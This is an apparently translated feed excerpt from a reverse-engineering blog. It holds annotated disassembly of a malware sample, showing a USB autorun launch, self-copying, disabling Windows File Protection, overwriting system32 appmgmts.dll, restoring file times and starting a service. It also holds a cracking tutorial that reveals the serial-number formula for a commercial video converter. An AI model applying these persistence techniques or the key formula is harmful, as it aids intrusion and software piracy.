004064E5  |.  8D85 E0FEFFFF lea     eax, dword ptr [ebp-120]         ; |
004064EB  |.  50            push    eax                              ; |String1
004064EC  |.  FF15 1C914000 call    dword ptr [&lt;&amp;KERNEL32.lstrcpyA&gt;] ; \lstrcpyA
004064F2  |.  68 01010000   push    101                              ; /n = 101 (257.)
004064F7  |.  6A 00         push    0                                ; |c = 00
004064F9  |.  8D85 E3FEFFFF lea     eax, dword ptr [ebp-11D]         ; |
004064FF  |.  50            push    eax                              ; |s
00406500  |.  E8 3D290000   call    &lt;jmp.&amp;MSVCRT.memset&gt;             ; \memset
00406505  |.  83C4 0C       add     esp, 0C                          ;  keep the first three bytes of the path (get the current drive)
00406508  |.  8D85 E0FEFFFF lea     eax, dword ptr [ebp-120]
0040650E  |.  50            push    eax                              ; /RootPathName
0040650F  |.  FF15 A4904000 call    dword ptr [&lt;&amp;KERNEL32.GetDriveTy&gt;; \GetDriveTypeA
00406515  |.  83F8 02       cmp     eax, 2                           ;  check the current drive type
00406518  |.  75 39         jnz     short 00406553                   ;  ---------------------------------
0040651A  |.  8D85 E0FEFFFF lea     eax, dword ptr [ebp-120]
00406520  |.  50            push    eax                              ; /&lt;%s&gt;
00406521  |.  68 A09A4000   push    00409AA0                         ; |Format = &quot;/n,%s&quot;
00406526  |.  8D85 98FDFFFF lea     eax, dword ptr [ebp-268]         ; |
0040652C  |.  50            push    eax                              ; |s
0040652D  |.  FF15 10924000 call    dword ptr [&lt;&amp;USER32.wsprintfA&gt;]  ; \wsprintfA
00406533  |.  83C4 0C       add     esp, 0C
00406536  |.  6A 05         push    5                                ; /IsShown = 5
00406538  |.  6A 00         push    0                                ; |DefDir = NULL
0040653A  |.  8D85 98FDFFFF lea     eax, dword ptr [ebp-268]         ; |
00406540  |.  50            push    eax                              ; |Parameters
00406541  |.  68 A89A4000   push    00409AA8                         ; |FileName = &quot;explorer.exe&quot;
00406546  |.  68 B89A4000   push    00409AB8                         ; |Operation = &quot;open&quot;
0040654B  |.  6A 00         push    0                                ; |hWnd = NULL
0040654D  |.  FF15 E4914000 call    dword ptr [&lt;&amp;SHELL32.ShellExecut&gt;; \ShellExecuteA
00406553  |&gt;  C745 EC C09A4&gt;mov     dword ptr [ebp-14], 00409AC0     ;  ---if it is a removable device, launch explorer---
00401681  |&gt; \6A 00         push    0                                ; /hTemplateFile = NULL
00401683  |.  68 80000000   push    80                               ; |Attributes = NORMAL
00401688  |.  FFB5 E8FEFFFF push    dword ptr [ebp-118]              ; |Mode
0040168E  |.  6A 00         push    0                                ; |pSecurity = NULL
00401690  |.  6A 03         push    3                                ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401692  |.  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00401697  |.  68 08934000   push    00409308                         ; |FileName = &quot;C:\DelInfo.bin&quot;
0040169C  |.  FF15 C4904000 call    dword ptr [&lt;&amp;KERNEL32.CreateFile&gt;; \CreateFileA
004016A2  |.  8985 ECFEFFFF mov     dword ptr [ebp-114], eax         ;  create file C:\Delinfo.bin
</pre>
<pre class="brush: plain; title: ; notranslate">
0040175C  |&gt; \6A 00         push    0                                ; /pOverlapped = NULL
0040175E  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
00401761  |.  50            push    eax                              ; |pBytesWritten
00401762  |.  6A 04         push    4                                ; |nBytesToWrite = 4
00401764  |.  8D45 0C       lea     eax, dword ptr [ebp+C]           ; |
00401767  |.  50            push    eax                              ; |Buffer
00401768  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; |hFile
0040176E  |.  FF15 E0904000 call    dword ptr [&lt;&amp;KERNEL32.WriteFile&gt;&gt;; \WriteFile
00401774  |.  6A 00         push    0                                ; /write 01000000
00401776  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
00401779  |.  50            push    eax                              ; |pBytesWritten
0040177A  |.  FF75 08       push    dword ptr [ebp+8]                ; |/String
0040177D  |.  FF15 D0904000 call    dword ptr [&lt;&amp;KERNEL32.lstrlenA&gt;] ; |\lstrlenA
00401783  |.  50            push    eax                              ; |nBytesToWrite
00401784  |.  FF75 08       push    dword ptr [ebp+8]                ; |Buffer
00401787  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; |hFile
0040178D  |.  FF15 E0904000 call    dword ptr [&lt;&amp;KERNEL32.WriteFile&gt;&gt;; \WriteFile
00401793  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; /after 01000000, write its own path
00401799  |.  FF15 10914000 call    dword ptr [&lt;&amp;KERNEL32.CloseHandl&gt;; \CloseHandle
</pre>
<pre class="brush: plain; title: ; notranslate">
00401C0B  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
00401C10  |.  8D85 E8FEFFFF lea     eax, dword ptr [ebp-118]         ; |
00401C16  |.  50            push    eax                              ; |PathBuffer
00401C17  |.  FF75 08       push    dword ptr [ebp+8]                ; |hModule
00401C1A  |.  FF15 00914000 call    dword ptr [&lt;&amp;KERNEL32.GetModuleF&gt;; \GetModuleFileNameA
00401C20  |.  83A5 E0FEFFFF&gt;and     dword ptr [ebp-120], 0           ;  get the path
00401C27  |.  EB 0D         jmp     short 00401C36
00401C29  |&gt;  8B85 E0FEFFFF /mov     eax, dword ptr [ebp-120]
00401C2F  |.  40            |inc     eax
00401C30  |.  8985 E0FEFFFF |mov     dword ptr [ebp-120], eax
00401C36  |&gt;  83BD E0FEFFFF&gt; cmp     dword ptr [ebp-120], 32
00401C3D  |.  7D 31         |jge     short 00401C70
00401C3F  |.  6A 00         |push    0                               ; /hTemplateFile = NULL
00401C41  |.  6A 00         |push    0                               ; |Attributes = 0
00401C43  |.  6A 03         |push    3                               ; |Mode = OPEN_EXISTING
00401C45  |.  6A 00         |push    0                               ; |pSecurity = NULL
00401C47  |.  6A 01         |push    1                               ; |ShareMode = FILE_SHARE_READ
00401C49  |.  68 00000080   |push    80000000                        ; |Access = GENERIC_READ
00401C4E  |.  8D85 E8FEFFFF |lea     eax, dword ptr [ebp-118]        ; |
00401C54  |.  50            |push    eax                             ; |FileName
00401C55  |.  FF15 C4904000 |call    dword ptr [&lt;&amp;KERNEL32.CreateFil&gt;; \CreateFileA
00401C5B  |.  8945 F4       |mov     dword ptr [ebp-C], eax          ;  open itself

00401C70  |&gt; \6A 00         push    0                                ; /pFileSizeHigh = NULL
00401C72  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hFile
00401C75  |.  FF15 24914000 call    dword ptr [&lt;&amp;KERNEL32.GetFileSiz&gt;; \GetFileSize
00401C7B  |.  8945 F8       mov     dword ptr [ebp-8], eax           ;  get its own size

00401CEF  |.  6A 00         push    0                                ; /pOverlapped = NULL
00401CF1  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
00401CF4  |.  50            push    eax                              ; |pBytesRead
00401CF5  |.  FF75 F8       push    dword ptr [ebp-8]                ; |BytesToRead
00401CF8  |.  FFB5 E4FEFFFF push    dword ptr [ebp-11C]              ; |Buffer
00401CFE  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hFile
00401D01  |.  FF15 EC904000 call    dword ptr [&lt;&amp;KERNEL32.ReadFile&gt;] ; \ReadFile
00401D07  |.  FF75 F4       push    dword ptr [ebp-C]                ; /read itself into the buffer
00401D0A  |.  FF15 10914000 call    dword ptr [&lt;&amp;KERNEL32.CloseHandl&gt;; \CloseHandle
</pre>
<pre class="brush: plain; title: ; notranslate">
004020AE   .  68 04010000   push    104                              ; /BufSize = 104 (260.)
004020B3   .  8D85 D8FDFFFF lea     eax, dword ptr [ebp-228]         ; |
004020B9   .  50            push    eax                              ; |Buffer
004020BA   .  FF15 38914000 call    dword ptr [&lt;&amp;KERNEL32.GetWindows&gt;; \GetWindowsDirectoryA
004020C0   .  68 04010000   push    104                              ; /get the system directory
004020C5   .  6A 00         push    0                                ; |c = 00
004020C7   .  8D85 E8FEFFFF lea     eax, dword ptr [ebp-118]         ; |
004020CD   .  50            push    eax                              ; |s
004020CE   .  E8 6F6D0000   call    &lt;jmp.&amp;MSVCRT.memset&gt;             ; \memset
004020D3   .  83C4 0C       add     esp, 0C
004020D6   .  8D85 E8FEFFFF lea     eax, dword ptr [ebp-118]
004020DC   .  50            push    eax                              ; /Buffer
004020DD   .  68 04010000   push    104                              ; |BufSize = 104 (260.)
004020E2   .  FF15 4C914000 call    dword ptr [&lt;&amp;KERNEL32.GetTempPat&gt;; \GetTempPathA
004020E8   .  68 3F000F00   push    0F003F                           ;  get the temp directory
</pre>
<pre class="brush: plain; title: ; notranslate">
004020ED   .  6A 00         push    0
004020EF   .  6A 00         push    0
004020F1   .  FF15 18904000 call    dword ptr [&lt;&amp;ADVAPI32.OpenSCMana&gt;;  ADVAPI32.OpenSCManagerA
004020F7   .  8945 FC       mov     dword ptr [ebp-4], eax           ;  open the SCM
004020FA   .  68 B0944000   push    004094B0                         ; /FileName = &quot;sfc_os.dll&quot;
004020FF   .  FF15 40914000 call    dword ptr [&lt;&amp;KERNEL32.LoadLibrar&gt;; \LoadLibraryA
00402105   .  8985 B4F9FFFF mov     dword ptr [ebp-64C], eax         ;  load sfc_os.dll

0040211E   &gt; \6A 05         push    5                                ; /ProcNameOrOrdinal = #5
00402120   .  FFB5 B4F9FFFF push    dword ptr [ebp-64C]              ; |hModule
00402126   .  FF15 F4904000 call    dword ptr [&lt;&amp;KERNEL32.GetProcAdd&gt;; \GetProcAddress
0040212C   .  A3 44DC4000   mov     dword ptr [40DC44], eax          ;  get SetSfcFileException
</pre>
<pre class="brush: plain; title: ; notranslate">
004021B8   &gt; \68 FF010F00   push    0F01FF
004021BD   .  8D85 30F4FFFF lea     eax, dword ptr [ebp-BD0]
004021C3   .  50            push    eax
004021C4   .  FF75 FC       push    dword ptr [ebp-4]
004021C7   .  FF15 14904000 call    dword ptr [&lt;&amp;ADVAPI32.OpenServic&gt;;  ADVAPI32.OpenServiceA
004021CD   .  8985 E0FEFFFF mov     dword ptr [ebp-120], eax         ;  open AppMgmt (service manager)

004021FA   .  50            push    eax
004021FB   .  FFB5 E0FEFFFF push    dword ptr [ebp-120]
00402201   .  FF15 04904000 call    dword ptr [&lt;&amp;ADVAPI32.QueryServi&gt;;  ADVAPI32.QueryServiceStatus
00402207   .  83BD D8F3FFFF&gt;cmp     dword ptr [ebp-C28], 1           ;  query the service status

0040225C   .  8D85 F0F3FFFF lea     eax, dword ptr [ebp-C10]
00402262   .  50            push    eax                              ; /&lt;%s&gt;
00402263   .  8D85 D8FDFFFF lea     eax, dword ptr [ebp-228]         ; |
00402269   .  50            push    eax                              ; |&lt;%s&gt;
0040226A   .  68 BC944000   push    004094BC                         ; |Format = &quot;%s\system32\%s.dll&quot;
0040226F   .  8D85 A8F8FFFF lea     eax, dword ptr [ebp-758]         ; |
00402275   .  50            push    eax                              ; |s
00402276   .  FF15 10924000 call    dword ptr [&lt;&amp;USER32.wsprintfA&gt;]  ; \wsprintfA
0040227C   .  83C4 10       add     esp, 10                          ;  build the string C:\WINDOWS\system32\appmgmts.dll
0040227F   .  8D85 A8F8FFFF lea     eax, dword ptr [ebp-758]
00402285   .  50            push    eax

00401E53   .  FF75 08       push    dword ptr [ebp+8]                            ; /Path = &quot;C:\WINDOWS\system32\appmgmts.dll&quot;
00401E56   .  FF15 F0914000 call    dword ptr [&lt;&amp;SHLWAPI.PathFileExistsA&gt;]       ; \PathFileExistsA
00401E5C   .  83F8 01       cmp     eax, 1                                       ;  check whether C:\WINDOWS\system32\appmgmts.dll exists

00401E91   .  FFB5 B4F7FFFF push    dword ptr [ebp-84C]                          ; /WideBufSize
00401E97   .  8D85 B8F7FFFF lea     eax, dword ptr [ebp-848]                     ; |
00401E9D   .  50            push    eax                                          ; |WideCharBuf
00401E9E   .  FFB5 B4F7FFFF push    dword ptr [ebp-84C]                          ; |StringSize
00401EA4   .  FF75 08       push    dword ptr [ebp+8]                            ; |StringToMap = &quot;C:\WINDOWS\system32\appmgmts.dll&quot;
00401EA7   .  6A 00         push    0                                            ; |Options = 0
00401EA9   .  6A 00         push    0                                            ; |CodePage = CP_ACP
00401EAB   .  FF15 98904000 call    dword ptr [&lt;&amp;KERNEL32.MultiByteToWideChar&gt;]  ; \MultiByteToWideChar
00401EB1   .  8365 FC 00    and     dword ptr [ebp-4], 0                         ;  convert &quot;C:\WINDOWS\system32\appmgmts.dll&quot; to Unicode
00401EB5   .  6A FF         push    -1
00401EB7   .  8D85 B8F7FFFF lea     eax, dword ptr [ebp-848]
00401EBD   .  50            push    eax
00401EBE   .  6A 00         push    0
00401EC0   .  68 F91E4000   push    00401EF9
00401EC5   .  8BFF          mov     edi, edi
00401EC7   .  55            push    ebp
00401EC8   .  A1 44DC4000   mov     eax, dword ptr [40DC44]
00401ECD   .  83C0 03       add     eax, 3
00401ED0   .  FFE0          jmp     eax                                          ;  disable Windows File Protection
</pre>
<p> </p>
<pre class="brush: plain; title: ; notranslate">
00401F14   &gt; \6A 00         push    0                                            ; /hTemplateFile = NULL
00401F16   .  6A 00         push    0                                            ; |Attributes = 0
00401F18   .  FF75 D0       push    dword ptr [ebp-30]                           ; |Mode
00401F1B   .  6A 00         push    0                                            ; |pSecurity = NULL
00401F1D   .  6A 00         push    0                                            ; |ShareMode = 0
00401F1F   .  68 000000C0   push    C0000000                                     ; |Access = GENERIC_READ|GENERIC_WRITE
00401F24   .  FF75 08       push    dword ptr [ebp+8]                            ; |FileName
00401F27   .  FF15 C4904000 call    dword ptr [&lt;&amp;KERNEL32.CreateFileA&gt;]          ; \CreateFileA
00401F2D   .  8945 D4       mov     dword ptr [ebp-2C], eax                      ;  open C:\WINDOWS\system32\appmgmts.dll

00401F50   .  50            push    eax                                          ; /pLastWrite = 0012F304
00401F51   .  8D45 C0       lea     eax, dword ptr [ebp-40]                      ; |
00401F54   .  50            push    eax                                          ; |pLastAccess
00401F55   .  8D45 B8       lea     eax, dword ptr [ebp-48]                      ; |
00401F58   .  50            push    eax                                          ; |pCreationTime
00401F59   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401F5C   .  FF15 44914000 call    dword ptr [&lt;&amp;KERNEL32.GetFileTime&gt;]          ; \GetFileTime
00401F62   .  837D D0 02    cmp     dword ptr [ebp-30], 2                        ;  get the file times

00401F9A   &gt; \6A 00         push    0                                            ; /Origin = FILE_BEGIN
00401F9C   .  6A 00         push    0                                            ; |pOffsetHi = NULL
00401F9E   .  FF75 DC       push    dword ptr [ebp-24]                           ; |OffsetLo
00401FA1   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401FA4   .  FF15 28914000 call    dword ptr [&lt;&amp;KERNEL32.SetFilePointer&gt;]       ; \SetFilePointer
00401FAA   .  A1 3CDC4000   mov     eax, dword ptr [40DC3C]                      ;  set the file pointer to file offset 3C
00401FAF   .  0345 DC       add     eax, dword ptr [ebp-24]
00401FB2   .  8945 E4       mov     dword ptr [ebp-1C], eax
00401FB5   .  6A 00         push    0                                            ; /pOverlapped = NULL
00401FB7   .  8D45 D8       lea     eax, dword ptr [ebp-28]                      ; |
00401FBA   .  50            push    eax                                          ; |pBytesWritten
00401FBB   .  A1 40DC4000   mov     eax, dword ptr [40DC40]                      ; |
00401FC0   .  2B45 DC       sub     eax, dword ptr [ebp-24]                      ; |
00401FC3   .  50            push    eax                                          ; |nBytesToWrite
00401FC4   .  FF75 E4       push    dword ptr [ebp-1C]                           ; |Buffer
00401FC7   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401FCA   .  FF15 E0904000 call    dword ptr [&lt;&amp;KERNEL32.WriteFile&gt;]            ; \WriteFile
00401FD0   .  85C0          test    eax, eax                                     ;  write data into C:\WINDOWS\system32\appmgmts.dll

00401FE1   &gt; \6A 00         push    0                                            ; /Origin = FILE_BEGIN
00401FE3   .  6A 00         push    0                                            ; |pOffsetHi = NULL
00401FE5   .  FF35 40DC4000 push    dword ptr [40DC40]                           ; |OffsetLo = 3CC00 (248832.)
00401FEB   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401FEE   .  FF15 28914000 call    dword ptr [&lt;&amp;KERNEL32.SetFilePointer&gt;]       ; \SetFilePointer
00401FF4   .  FF75 D4       push    dword ptr [ebp-2C]                           ; /hFile
00401FF7   .  FF15 30914000 call    dword ptr [&lt;&amp;KERNEL32.SetEndOfFile&gt;]         ; \SetEndOfFile
00401FFD   .  8D45 C8       lea     eax, dword ptr [ebp-38]                      ;  write itself into C:\WINDOWS\system32\appmgmts.dll
00402000   .  50            push    eax                                          ; /pLastWrite
00402001   .  8D45 C0       lea     eax, dword ptr [ebp-40]                      ; |
00402004   .  50            push    eax                                          ; |pLastAccess
00402005   .  8D45 B8       lea     eax, dword ptr [ebp-48]                      ; |
00402008   .  50            push    eax                                          ; |pCreationTime
00402009   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
0040200C   .  FF15 34914000 call    dword ptr [&lt;&amp;KERNEL32.SetFileTime&gt;]          ; \SetFileTime
00402012   .  FF75 D4       push    dword ptr [ebp-2C]                           ;  restore the original file times
</pre>
<p> </p>
<pre class="brush: plain; title: ; notranslate">
00402293   &gt; \6A 00         push    0
00402295   .  6A 00         push    0
00402297   .  FFB5 E0FEFFFF push    dword ptr [ebp-120]
0040229D   .  FF15 24904000 call    dword ptr [&lt;&amp;ADVAPI32.StartServiceA&gt;]        ;  ADVAPI32.StartServiceA, start the service
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.lingdux.com/2010/194.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>EZ VIDEO TO AVI Converter registration-code analysis</title>
		<link>http://www.lingdux.com/2010/169.html</link>
		<comments>http://www.lingdux.com/2010/169.html#comments</comments>
		<pubDate>Fri, 07 May 2010 04:01:01 +0000</pubDate>
		<dc:creator>零度x</dc:creator>
				<category><![CDATA[逆向学习]]></category>
		<category><![CDATA[分析]]></category>
		<category><![CDATA[注册码]]></category>

		<guid isPermaLink="false">http://www.lingdux.com/?p=169</guid>
		<description><![CDATA[Eztoo AVI Video Converter is a powerful AVI conversion tool that converts MPEG (MPG), WMV (ASF, ASX), AVI (DivX, XviD) and VCD files to AVI. It is easy to use: a few mouse clicks complete the conversion, it is fast, the quality is good, it supports batch and automatic conversion, and you can also set your own parameters for the output AVI file. With its help, conversion becomes very easy.

Download: http://www.newhua.com/soft/56777.htm

After installing and running it, it asks for registration; entering anything at random gives the prompt "invalid register code! please retry!"

<span class="readmore"><a href="http://www.lingdux.com/2010/169.html" title="EZ VIDEO TO AVI Converter registration-code analysis">Read the full post (9021 characters in total)</a></span>]]></description>
			<content:encoded><![CDATA[<p>Eztoo AVI Video Converter is a powerful AVI conversion tool that converts MPEG (MPG), WMV (ASF, ASX), AVI (DivX, XviD) and VCD files to AVI. It is easy to use: a few mouse clicks complete the conversion, it is fast, the quality is good, it supports batch and automatic conversion, and you can also set your own parameters for the output AVI file. With its help, conversion becomes very easy.</p>
<p>Download: http://www.newhua.com/soft/56777.htm</p>
<p>After installing and running it, it asks for registration; entering anything at random gives the prompt "invalid register code! please retry!"</p>
<p>Then find where this string is referenced; the call site is as follows:</p>
<p>004B03F6   .  55            push    ebp<br />
004B03F7   .  68 FE054B00   push    004B05FE<br />
004B03FC   .  64:FF30       push    dword ptr fs:[eax]<br />
004B03FF   .  64:8920       mov     dword ptr fs:[eax], esp<br />
004B0402   .  C605 9C7D4B00&gt;mov     byte ptr [4B7D9C], 1             ;  global variable<br />
004B0409   .  FF05 987D4B00 inc     dword ptr [4B7D98]               ;  &#8212;&#8212;&#8212;-3-attempt input limit&#8212;&#8212;&#8212;&#8212;-</p>
<p><span id="more-169"></span><br />
004B040F   .  833D 987D4B00&gt;cmp     dword ptr [4B7D98], 3<br />
004B0416      7E 07         jle     short 004B041F<br />
004B0418   .  8BC7          mov     eax, edi<br />
004B041A   .  E8 B907FDFF   call    00480BD8                         ;  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
004B041F   &gt;  8D55 F4       lea     edx, dword ptr [ebp-C]<br />
004B0422   .  8B87 1C030000 mov     eax, dword ptr [edi+31C]<br />
004B0428   .  E8 0342FBFF   call    00464630                         ;  get the user name<br />
004B042D   .  8B45 F4       mov     eax, dword ptr [ebp-C]<br />
004B0430   .  8D55 FC       lea     edx, dword ptr [ebp-4]<br />
004B0433   .  E8 7C82F5FF   call    004086B4<br />
004B0438   .  8D55 F0       lea     edx, dword ptr [ebp-10]<br />
004B043B   .  8B45 FC       mov     eax, dword ptr [ebp-4]<br />
004B043E   .  E8 A582F5FF   call    004086E8                         ;  strcpy, copy the user name<br />
004B0443   .  8B55 F0       mov     edx, dword ptr [ebp-10]<br />
004B0446   .  8D45 FC       lea     eax, dword ptr [ebp-4]<br />
004B0449   .  E8 763EF5FF   call    004042C4<br />
004B044E   .  BB 15000000   mov     ebx, 15                          ;  &#8212;&#8212;&#8212;&#8212;&#8212;&#8211;compare the user name&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
004B0453   .  BE CC5A4B00   mov     esi, 004B5ACC<br />
004B0458   &gt;  8B45 FC       mov     eax, dword ptr [ebp-4]           ;  user name<br />
004B045B   .  8B16          mov     edx, dword ptr [esi]             ;  the real user name<br />
004B045D   .  E8 D641F5FF   call    00404638                         ;  compare<br />
004B0462   .  75 09         jnz     short 004B046D<br />
004B0464   .  C605 9C7D4B00&gt;mov     byte ptr [4B7D9C], 0             ;  if equal, set the global variable to 0<br />
004B046B   .  EB 06         jmp     short 004B0473<br />
004B046D   &gt;  83C6 04       add     esi, 4<br />
004B0470   .  4B            dec     ebx<br />
004B0471   .^ 75 E5         jnz     short 004B0458<br />
004B0473   &gt;  803D 9C7D4B00&gt;cmp     byte ptr [4B7D9C], 0<br />
004B047A   .  74 1A         je      short 004B0496<br />
004B047C   .  6A 00         push    0<br />
004B047E   .  66:8B0D 0C064&gt;mov     cx, word ptr [4B060C]<br />
004B0485   .  B2 02         mov     dl, 2<br />
004B0487   .  B8 18064B00   mov     eax, 004B0618                    ;  invalid register code! please retry!<br />
004B048C   .  E8 7B55F8FF   call    00435A0C<br />
004B0491   .  E9 2D010000   jmp     004B05C3                         ;  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
004B0496   &gt;  8D55 EC       lea     edx, dword ptr [ebp-14]<br />
004B0499   .  8B87 20030000 mov     eax, dword ptr [edi+320]<br />
004B049F   .  E8 8C41FBFF   call    00464630                         ;  get the serial number<br />
004B04A4   .  8B45 EC       mov     eax, dword ptr [ebp-14]<br />
004B04A7   .  8D55 F8       lea     edx, dword ptr [ebp-8]<br />
004B04AA   .  E8 0582F5FF   call    004086B4<br />
004B04AF   .  8D55 E8       lea     edx, dword ptr [ebp-18]<br />
004B04B2   .  8B45 F8       mov     eax, dword ptr [ebp-8]<br />
004B04B5   .  E8 2E82F5FF   call    004086E8                         ;  strcpy, copy the serial number<br />
004B04BA   .  8B55 E8       mov     edx, dword ptr [ebp-18]<br />
004B04BD   .  8D45 F8       lea     eax, dword ptr [ebp-8]<br />
004B04C0   .  E8 FF3DF5FF   call    004042C4<br />
004B04C5   .  837D FC 00    cmp     dword ptr [ebp-4], 0             ;  is the user name empty?<br />
004B04C9   .  0F84 F4000000 je      004B05C3<br />
004B04CF   .  837D F8 00    cmp     dword ptr [ebp-8], 0             ;  is the serial number empty?<br />
004B04D3   .  0F84 EA000000 je      004B05C3<br />
004B04D9   .  8B45 F8       mov     eax, dword ptr [ebp-8]<br />
004B04DC   .  E8 0B40F5FF   call    004044EC                         ;  get the serial number length<br />
004B04E1   .  85C0          test    eax, eax<br />
004B04E3   .  7E 35         jle     short 004B051A<br />
004B04E5   .  BA 01000000   mov     edx, 1                           ;  &#8212;&#8212;&#8212;&#8211;check that every character of the serial number is a digit&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
004B04EA   &gt;  8B4D F8       mov     ecx, dword ptr [ebp-8]<br />
004B04ED   .  0FB64C11 FF   movzx   ecx, byte ptr [ecx+edx-1]        ;  serial number array<br />
004B04F2   .  83F9 30       cmp     ecx, 30<br />
004B04F5   .  7C 05         jl      short 004B04FC<br />
004B04F7   .  83F9 39       cmp     ecx, 39<br />
004B04FA   .  7E 1A         jle     short 004B0516<br />
004B04FC   &gt;  6A 00         push    0<br />
004B04FE   .  66:8B0D 0C064&gt;mov     cx, word ptr [4B060C]<br />
004B0505   .  B2 02         mov     dl, 2<br />
004B0507   .  B8 18064B00   mov     eax, 004B0618                    ;  invalid register code! please retry!<br />
004B050C   .  E8 FB54F8FF   call    00435A0C<br />
004B0511   .  E9 AD000000   jmp     004B05C3<br />
004B0516   &gt;  42            inc     edx<br />
004B0517   .  48            dec     eax<br />
004B0518   .^ 75 D0         jnz     short 004B04EA                   ;  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
004B051A   &gt;  33F6          xor     esi, esi<br />
004B051C   .  8B45 FC       mov     eax, dword ptr [ebp-4]<br />
004B051F   .  E8 C83FF5FF   call    004044EC                         ;  get the user name length<br />
004B0524   .  85C0          test    eax, eax<br />
004B0526   .  7E 13         jle     short 004B053B<br />
004B0528   .  BB 01000000   mov     ebx, 1                           ;  &#8212;&#8212;&#8212;-sum the ASCII values of the user name&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
004B052D   &gt;  8B55 FC       mov     edx, dword ptr [ebp-4]<br />
004B0530   .  0FB6541A FF   movzx   edx, byte ptr [edx+ebx-1]<br />
004B0535   .  03F2          add     esi, edx<br />
004B0537   .  43            inc     ebx<br />
004B0538   .  48            dec     eax<br />
004B0539   .^ 75 F2         jnz     short 004B052D                   ;  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
004B053B   &gt;  69C6 90B70B00 imul    eax, esi, 0BB790                 ;  (sum of user name ASCII values * 0x0BB790 + 0x314) / 2<br />
004B0541   .  05 14030000   add     eax, 314<br />
004B0546   .  D1F8          sar     eax, 1<br />
004B0548   .  79 03         jns     short 004B054D<br />
004B054A   .  83D0 00       adc     eax, 0<br />
004B054D   &gt;  8BF0          mov     esi, eax<br />
004B054F   .  8B45 F8       mov     eax, dword ptr [ebp-8]<br />
004B0552   .  E8 B183F5FF   call    00408908                         ;  convert the serial number string to a decimal integer<br />
004B0557   .  3BF0          cmp     esi, eax<br />
004B0559   .  75 53         jnz     short 004B05AE<br />
004B055B   .  6A 00         push    0<br />
004B055D   .  66:8B0D 0C064&gt;mov     cx, word ptr [4B060C]<br />
004B0564   .  B2 02         mov     dl, 2<br />
004B0566   .  B8 48064B00   mov     eax, 004B0648                    ;  congratuation! you have successfully registered!<br />
004B056B   .  E8 9C54F8FF   call    00435A0C<br />
004B0570   .  A1 9C5E4B00   mov     eax, dword ptr [4B5E9C]<br />
004B0575   .  C600 01       mov     byte ptr [eax], 1<br />
004B0578   .  A1 945F4B00   mov     eax, dword ptr [4B5F94]<br />
004B057D   .  8B00          mov     eax, dword ptr [eax]<br />
004B057F   .  33C9          xor     ecx, ecx<br />
004B0581   .  BA 04000000   mov     edx, 4<br />
004B0586   .  8B18          mov     ebx, dword ptr [eax]<br />
004B0588   .  FF53 14       call    dword ptr [ebx+14]<br />
004B058B   .  8B15 9C5E4B00 mov     edx, dword ptr [4B5E9C]          ;  EZ_VIDEO.004B7DAC<br />
004B0591   .  A1 945F4B00   mov     eax, dword ptr [4B5F94]<br />
004B0596   .  8B00          mov     eax, dword ptr [eax]<br />
004B0598   .  B9 01000000   mov     ecx, 1<br />
004B059D   .  E8 A2E3F6FF   call    0041E944<br />
004B05A2   .  A1 947D4B00   mov     eax, dword ptr [4B7D94]<br />
004B05A7   .  E8 2C06FDFF   call    00480BD8<br />
004B05AC   .  EB 15         jmp     short 004B05C3<br />
004B05AE   &gt;  6A 00         push    0<br />
004B05B0   .  66:8B0D 0C064&gt;mov     cx, word ptr [4B060C]<br />
004B05B7   .  B2 02         mov     dl, 2<br />
004B05B9   .  B8 18064B00   mov     eax, 004B0618                    ;  invalid register code! please retry!<br />
004B05BE   .  E8 4954F8FF   call    00435A0C<br />
004B05C3   &gt;  33C0          xor     eax, eax<br />
004B05C5   .  5A            pop     edx<br />
004B05C6   .  59            pop     ecx<br />
004B05C7   .  59            pop     ecx<br />
004B05C8   .  64:8910       mov     dword ptr fs:[eax], edx<br />
004B05CB   .  68 05064B00   push    004B0605<br />
004B05D0   &gt;  8D45 E8       lea     eax, dword ptr [ebp-18]<br />
004B05D3   .  E8 543CF5FF   call    0040422C<br />
004B05D8   .  8D45 EC       lea     eax, dword ptr [ebp-14]<br />
004B05DB   .  E8 4C3CF5FF   call    0040422C<br />
004B05E0   .  8D45 F0       lea     eax, dword ptr [ebp-10]<br />
004B05E3   .  E8 443CF5FF   call    0040422C<br />
004B05E8   .  8D45 F4       lea     eax, dword ptr [ebp-C]<br />
004B05EB   .  E8 3C3CF5FF   call    0040422C<br />
004B05F0   .  8D45 F8       lea     eax, dword ptr [ebp-8]<br />
004B05F3   .  BA 02000000   mov     edx, 2<br />
004B05F8   .  E8 533CF5FF   call    00404250<br />
004B05FD   .  C3            retn<br />
004B05FE   .^ E9 8935F5FF   jmp     00403B8C<br />
004B0603   .^ EB CB         jmp     short 004B05D0<br />
004B0605   .  5F            pop     edi<br />
